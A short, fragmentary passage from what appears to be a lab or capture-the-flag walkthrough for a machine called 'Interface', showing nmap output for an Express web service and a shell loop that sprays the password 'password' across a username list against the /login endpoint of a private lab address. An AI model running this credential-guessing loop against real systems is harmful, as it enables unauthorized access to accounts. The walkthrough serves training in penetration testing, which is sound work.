Interface
Enumeration
80/tcp open http Node.js Express framework
|_http-title: App
|_http-favicon: Unknown favicon MD5: 1FBDF735A0DD3E8321C5E0828A45A4D5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS$ cat usernames.txt | sed 's/,//g' | sed 's/""/\n/g' > usernames$ while read line; do curl -s -X POST -H 'Content-Type: application/json' --data-binary "{\"username\":\"$line\",\"password\":\"password\"}" http://192.168.145.106/login | grep -v Unauthorized && echo $line; done < usernames
OK
[REDACTED]Access
Last updated